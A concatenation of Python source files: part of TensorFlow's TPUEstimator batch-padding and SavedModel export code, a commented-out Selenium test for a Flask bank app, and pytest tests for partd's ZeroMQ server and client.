padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(real_batch_size, missing_count,
batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. Given that, the sliced padding mask should be all 0's.
# If this assertion fails, the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is a full batch or part of the stopping signals,
# we do not need to slice it, which saves time.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [
x for x in nest.flatten(batch_features) if isinstance(x, ops.Tensor)
]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
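# Illustrative example (assumed values): real_batch_size=5, missing_count=3,
# batch_size=8 yields padding_mask == [0, 0, 0, 0, 0, 1, 1, 1].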
padding_mask = array_ops.concat([
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider using Tensors with smaller shapes or reducing the batch '
'size. Given:\n'
'{}'.format(
message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()
])))
def _add_item_to_params(params, key, value):
"""Adds a new item into `params`."""
if isinstance(params, hparam.HParams):
# For HParams, we need to use special API.
if key in params:
params.set_hparam(key, value)
else:
params.add_hparam(key, value)
else:
# Now params is Python dict.
params[key] = value
def export_estimator_savedmodel(estimator,
export_dir_base,
serving_input_receiver_fn,
assets_extra=None,
as_text=False,
checkpoint_path=None,
strip_default_attrs=False):
"""Export `Estimator` trained model for TPU inference.
Args:
estimator: `Estimator` with which model has been trained.
export_dir_base: A string containing a directory in which to create
timestamped subdirectories containing exported SavedModels.
serving_input_receiver_fn: A function that takes no argument and returns a
`ServingInputReceiver` or `TensorServingInputReceiver`.
assets_extra: A dict specifying how to populate the assets.extra directory
within the exported SavedModel, or `None` if no extra assets are needed.
as_text: whether to write the SavedModel proto in text format.
checkpoint_path: The checkpoint path to export. If `None` (the default),
the most recent checkpoint found within the model directory is chosen.
strip_default_attrs: Boolean. If `True`, default-valued attributes will be
removed from the NodeDefs.
Returns:
The string path to the exported directory.
"""
# `TPUEstimator` requires `tpu_config.RunConfig`, so we cannot use
# `estimator.config`.
config = tpu_config.RunConfig(model_dir=estimator.model_dir)
est = TPUEstimator(
estimator._model_fn, # pylint: disable=protected-access
config=config,
params=estimator.params,
use_tpu=True,
train_batch_size=2048, # Does not matter.
eval_batch_size=2048, # Does not matter.
)
return est.export_savedmodel(export_dir_base, serving_input_receiver_fn,
assets_extra, as_text, checkpoint_path,
strip_default_attrs)
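# Usage sketch (illustrative only; `my_estimator`, `my_serving_input_fn`, and
# the export path below are placeholders):
#
#   export_dir = export_estimator_savedmodel(
#       my_estimator, '/tmp/tpu_export', my_serving_input_fn)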
|
test_selenium.py
|
# class SeleniumTestCase(unittest.TestCase):
# client = None
# app = None
#
# def __init__(cls, app):
# # super(SeleniumTestCase, cls).__init__(**kwargs)
# cls.app = app
#
# @classmethod
# def setUpClass(cls):
#
# try:
# cls.client = webdriver.Safari(port=5001)
# except:
# pass
#
# if cls.client:
# # create program
# cls.app_context = cls.app.app_context()
# cls.app_context.push()
#
# # create db
# db.create_all()
# Bank.generate_fake()
#
# # run bankmake program
# threading.Thread(target=cls.app.run).start()
#
# @classmethod
# def tearDownClass(cls):
# if cls.client:
# cls.client.get("http://127.0.0.1:5000/shutdown")
# cls.client.close()
#
# db.drop_all()
# db.session.remove()
#
# cls.app_context.pop()
#
# def setUp(self):
# if not self.client:
# self.skipTest("Web Browser not available")
#
# def tearDown(self):
# pass
#
# def get_banks(self):
#
# # show bank page
# self.client.get("http://127.0.0.1:5000/")
# self.assertTrue(re.search("zhangziran"), self.client.page_source)
#
# # click add button
# self.client.find_elements_by_id("bankAdd").click()
# self.assertTrue("bankForm", self.client.page_source)
#
# # add banks
# self.client.find_element_by_name("bankName").send_keys("ZHO")
# self.client.find_element_by_name("bankCity").send_keys("Beijing")
# self.client.find_element_by_name("bankAddress").send_keys("XiCheng District")
# self.assertTrue(re.search("true"), self.client.page_source)
|
test_zmq.py
|
import pytest
pytest.importorskip('zmq')
from partd.zmq import Server, keys_to_flush, File, Client
from partd import core, Dict
from threading import Thread
from time import sleep
from contextlib import contextmanager
import pickle
import os
import shutil
def test_server():
s = Server()
try:
s.start()
s.append({'x': b'abc', 'y': b'1234'})
s.append({'x': b'def', 'y': b'5678'})
assert s.get(['x']) == [b'abcdef']
assert s.get(['x', 'y']) == [b'abcdef', b'12345678']
assert s.get(['x']) == [b'abcdef']
finally:
s.close()
def dont_test_flow_control():
path = 'bar'
if os.path.exists('bar'):
shutil.rmtree('bar')
s = Server('bar', available_memory=1, n_outstanding_writes=3, start=False)
p = Client(s.address)
try:
listen_thread = Thread(target=s.listen)
listen_thread.start()
""" Don't start these threads
self._write_to_disk_thread = Thread(target=self._write_to_disk)
self._write_to_disk_thread.start()
self._free_frozen_sockets_thread = Thread(target=self._free_frozen_sockets)
self._free_frozen_sockets_thread.start()
"""
p.append({'x': b'12345'})
sleep(0.1)
assert s._out_disk_buffer.qsize() == 1
p.append({'x': b'12345'})
p.append({'x': b'12345'})
sleep(0.1)
assert s._out_disk_buffer.qsize() == 3
held_append = Thread(target=p.append, args=({'x': b'123'},))
held_append.start()
sleep(0.1)
assert held_append.is_alive() # held!
assert not s._frozen_sockets.empty()
write_to_disk_thread = Thread(target=s._write_to_disk)
write_to_disk_thread.start()
free_frozen_sockets_thread = Thread(target=s._free_frozen_sockets)
free_frozen_sockets_thread.start()
sleep(0.2)
assert not held_append.is_alive()
assert s._frozen_sockets.empty()
finally:
s.close()
@contextmanager
def partd_server(**kwargs):
with Server(**kwargs) as server:
with Client(server.address) as p:
yield (p, server)
def test_partd_object():
with partd_server() as (p, server):
p.append({'x': b'Hello', 'y': b'abc'})
p.append({'x': b'World!', 'y': b'def'})
result = p.get(['y', 'x'])
assert result == [b'abcdef', b'HelloWorld!']
def test_delete():
with partd_server() as (p, server):
p.append({'x': b'Hello'})
assert p.get('x') == b'Hello'
p.delete(['x'])
assert p.get('x') == b''
def test_iset():
with partd_server() as (p, server):
p.iset('x', b'111')
p.iset('x', b'111')
assert p.get('x') == b'111'
def test_tuple_keys():
with partd_server() as (p, server):
p.append({('x', 'y'): b'123'})
assert p.get(('x', 'y')) == b'123'
def test_serialization():
with partd_server() as (p, server):
p.append({'x': b'123'})
q = pickle.loads(pickle.dumps(p))
assert q.get('x') == b'123'
def test_drop():
with partd_server() as (p, server):
p.append({'x': b'123'})
p.drop()
assert p.get('x') == b''
def dont_test_server_autocreation():
with Client() as p:
p.append({'x': b'123'})
assert p.get('x') == b'123'
|